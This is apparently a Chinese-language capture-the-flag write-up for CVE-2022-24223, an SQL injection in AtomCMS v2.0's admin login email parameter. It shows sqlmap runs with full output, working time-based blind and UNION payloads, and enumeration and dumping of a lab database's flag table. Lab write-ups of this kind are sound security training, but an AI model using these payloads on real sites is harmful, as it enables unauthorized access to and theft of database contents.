CVE-2022-24223

信息

Tags

• AtomCMS SQL 注入漏洞

官方数据库记录

AtomCMS v2.0 被发现包含通过 /admin/login.php 的 SQL 注入漏洞。

• AtomCMS v2.0 - SQLi
• AtomCMS - SQL Injection / Arbitrary File Upload

根据数据库记录，以及 poc 的说明，可以得知 /admin/login.php 页面接收 POST 形式的 email 参数的传入，其中 email 参数可以构建 sql 注入攻击，即登陆的参数构建了 sql 不安全查询

可以尝试直接使用 sqlmap 进行自动化注入攻击

┌──(randark ㉿ kali)-[~]
└─$ cat sqlmap.txt
POST /admin/login.php HTTP/1.1
Host: eci-2zeg3gxh9t865uonuv0j.cloudeci1.ichunqiu.com
Content-Length: 32
Cache-Control: max-age=0
Accept-Language: zh-CN
Upgrade-Insecure-Requests: 1
Origin: http://eci-2zeg3gxh9t865uonuv0j.cloudeci1.ichunqiu.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://eci-2zeg3gxh9t865uonuv0j.cloudeci1.ichunqiu.com/admin/login.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=p6peqi5qvl49gcjtaiirkdbm1h
Connection: keep-alive

email=123%40123.com&password=123

┌──(randark ㉿ kali)-[~]
└─$ sqlmap --random-agent -r sqlmap.txt --batch
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.8.6.3#dev}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:58:08 /2024-07-22/

[22:58:08] [INFO] parsing HTTP request from 'sqlmap.txt'
[22:58:08] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[22:58:08] [INFO] testing connection to the target URL
[22:58:09] [INFO] testing if the target URL content is stable
[22:58:09] [INFO] target URL content is stable
[22:58:09] [INFO] testing if POST parameter 'email' is dynamic
[22:58:09] [WARNING] POST parameter 'email' does not appear to be dynamic
[22:58:09] [WARNING] heuristic (basic) test shows that POST parameter 'email' might not be injectable
[22:58:10] [INFO] testing for SQL injection on POST parameter 'email'
[22:58:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:58:10] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[22:58:11] [WARNING] turning off pre-connect mechanism because of connection reset(s)
[22:58:11] [WARNING] there is a possibility that the target (or WAF/IPS) is resetting 'suspicious' requests
[22:58:11] [CRITICAL] connection reset to the target URL. sqlmap is going to retry the request(s)
[22:58:11] [CRITICAL] connection reset to the target URL
[22:58:11] [CRITICAL] connection reset to the target URL. sqlmap is going to retry the request(s)
[22:58:11] [CRITICAL] connection reset to the target URL
[22:58:11] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[22:58:12] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[22:58:13] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[22:58:14] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[22:58:15] [INFO] testing 'Generic inline queries'
[22:58:15] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[22:58:16] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[22:58:17] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[22:58:17] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[22:58:28] [INFO] POST parameter 'email' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[22:58:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:58:28] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
got a 302 redirect to 'http://eci-2zeg3gxh9t865uonuv0j.cloudeci1.ichunqiu.com/admin/index.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] N
[22:58:32] [INFO] target URL appears to be UNION injectable with 6 columns
[22:58:33] [INFO] POST parameter 'email' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'email' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 71 HTTP(s) requests:
---
Parameter: email (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: email=123@123.com'AND (SELECT 6309 FROM (SELECT(SLEEP(5)))fpKx) AND'yhQA'='yhQA&password=123

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: email=123@123.com' UNION ALL SELECT NULL,CONCAT(0x7178706b71,0x66684d5463656955736d576a4878746c444a6c4b52445466514d79487361756b756e7668726a705a,0x7162717071),NULL,NULL,NULL,NULL-- -&password=123
---
[22:58:33] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[22:58:34] [INFO] fetched data logged to text files under '/home/randark/.local/share/sqlmap/output/eci-2zeg3gxh9t865uonuv0j.cloudeci1.ichunqiu.com'

[*] ending @ 22:58:34 /2024-07-22/

根据 sqlmap 的输出结果，可以确定 email 参数存在注入点，注入点信息 MySQL >= 5.0.12 AND time-based blind (query SLEEP)

接下来获取数据库所有信息

┌──(randark ㉿ kali)-[~]
└─$ sqlmap --random-agent -r sqlmap.txt --batch --dbs
......
[23:00:17] [INFO] fetching database names
got a 302 redirect to 'http://eci-2zeg3gxh9t865uonuv0j.cloudeci1.ichunqiu.com/admin/index.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] N
available databases [5]:
[*] atomcms
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys

┌──(randark ㉿ kali)-[~]
└─$ sqlmap --random-agent -r sqlmap.txt --batch -D atomcms --tables
......
[23:01:04] [INFO] fetching tables for database: 'atomcms'
got a 302 redirect to 'http://eci-2zeg3gxh9t865uonuv0j.cloudeci1.ichunqiu.com/admin/index.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] N
Database: atomcms
[4 tables]
+----------+
| flag     |
| pages    |
| settings |
| users    |
+----------+

┌──(randark ㉿ kali)-[~]
└─$ sqlmap --random-agent -r sqlmap.txt --batch -D atomcms -T flag --dump
......
[23:01:26] [INFO] fetching entries for table 'flag' in database 'atomcms'
Database: atomcms
Table: flag
[1 entry]
+--------------------------------------------+
| flag                                       |
+--------------------------------------------+
| flag{0bcccbd4-27a9-4e9f-b6ba-09951ef02968} |
+--------------------------------------------+

flag{0bcccbd4-27a9-4e9f-b6ba-09951ef02968}